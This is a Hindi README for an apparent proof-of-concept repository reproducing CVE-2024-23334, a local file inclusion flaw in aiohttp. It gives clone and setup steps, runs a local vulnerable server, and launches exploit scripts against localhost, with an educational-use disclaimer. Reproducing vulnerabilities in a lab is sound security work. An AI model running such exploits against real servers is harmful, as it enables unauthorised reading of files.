
यह रिपॉजिटरी CVE-2024-23334 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (POC) है, जो aiohttp में उस बग को दोहराने का प्रयास प्रदर्शित करता है जो लोकल फाइल इन्क्लूज़न (LFI) की ओर ले जाता है।
यह रिपॉजिटरी CVE-2024-23334 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (POC) है, जो aiohttp में उस बग को दोहराने का प्रयास दर्शाती है जो लोकल फ़ाइल इन्क्लूज़न (LFI) की ओर ले जाता है।
[!CAUTION] अस्वीकरण: यह POC केवल शैक्षिक उद्देश्यों के लिए है। इसे वास्तविक दुनिया के परिदृश्यों में उपयोग न करें।
git clone https://github.com/Betan423/CVE-2024-23334-PoC
cd CVE-2024-23334-PoC
# वर्चुअल एनवायरनमेंट में चलाएँ
python3 -m venv .env
chmod +x ./.env/bin/activate
source ./.env/bin/activate
pip3 install -r requirements.txt
python server.py
bash exploit.sh
या
python3 exploit.py -s http://localhost:8081
बधाई हो! आपने CVE-2024-23334 को सफलतापूर्वक दोहरा लिया है।
cd static
ln -s ~/Desktop/test.txt test
CVE-2024-23334
jhonnybonny/CVE-2024-23334
z3rObyte/CVE-2024-23334-PoC